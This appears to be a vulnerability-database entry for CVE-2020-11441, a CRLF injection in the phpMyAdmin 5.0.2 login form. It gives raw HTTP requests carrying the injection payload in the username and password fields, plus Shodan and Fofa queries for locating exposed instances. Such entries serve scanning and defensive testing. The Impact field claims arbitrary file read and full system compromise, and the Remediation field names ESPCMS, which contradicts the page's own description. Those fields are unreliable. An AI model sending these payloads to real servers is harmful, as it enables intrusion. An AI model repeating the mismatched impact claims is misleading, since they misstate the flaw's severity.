| Title | phpMyAdmin 5.0.2 - CRLF Injection |
|---|---|
| Author | ritikchaddha |
| Severity | Medium |
| Impact | Unauthenticated attackers can read arbitrary files from the server including configuration files and credentials, potentially leading to complete system compromise. |
| Remediation | Upgrade to a patched version of the ESPCMS or apply vendor-provided security updates. |
| CVSS Score | 6.1 |
| EPSS Score | 0.00653 |
| CVE ID | CVE-2020-11441 |
| CWE ID | CWE-93 |
| Shodan Query | title:"phpmyadmin" |
| Fofa Query | title="phpmyadmin" |
| Tags | cve crlf phpmyadmin cve2020 vuln |
phpMyAdmin 5.0.2 allows CRLF injection, as demonstrated by %0D%0Astring%0D%0A inputs to login form fields causing CRLF sequences to be reflected on an error page. NOTE: the vendor states “I don’t see anything specifically exploitable.
GET /index.php?route=/ HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Connection: close
Accept-Encoding: gzip
POST /index.php?route=/ HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36
Connection: close
Content-Length: 150
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
set_session=7cibpR&pma_username=%0D%0Atest:crlfinjection=1%0D%0A&pma_password=%0D%0Atest:crlfinjection=1%0D%0A&server=1&route=%2F&lang=en&token=eP0ZZW
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-11441.yaml
🦈 Packet Capture: ⬇️ Download cve-2020-11441.pcap
N/AN/A